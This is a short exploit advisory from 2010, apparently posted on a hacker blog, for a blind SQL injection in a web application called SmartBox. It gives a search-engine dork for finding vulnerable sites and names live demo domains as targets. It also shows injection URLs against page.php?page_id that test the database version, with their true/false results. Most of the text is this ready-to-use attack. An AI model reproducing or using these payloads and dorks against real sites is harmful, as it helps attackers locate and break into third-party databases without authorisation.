~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : http://h4x0resec.blogspot.com [~] Reference : http://h4x0resec.blogspot.com [~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : SmartBox |~Price : N/A |~Version : N/A |~Software: http://www.smartbox.an |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~sqL : MysqL |~Google Keyword : Powered by www.dowgroup.com |[~]Date : "26.11.2010" |[~]Tested on : (L):Vista (R):Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 MYSQL ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Demos: http://www.smartbox.an http://www.infocapital.an ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| Page.php SQL Injection~~~~~~~~~~~}| http://$Site/$path/page.php?page_id=14 {SQL Injection} Ex; http://www.smartbox.an [~] SQL Injecting http://www.smartbox.an/page.php?page_id=14%20and%20substring%28@@version,1,1%29=4 [~] MySQL : FALSE. [~] SQL Injecting http://www.smartbox.an/page.php?page_id=14%20and%20substring%28@@version,1,1%29=5 [~] MySQL : TRUE To your continue.. =============================================================
26 Kasım 2010 Cuma
SmartBox <= (page_id) Blind SQL Injection Vulnerability
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder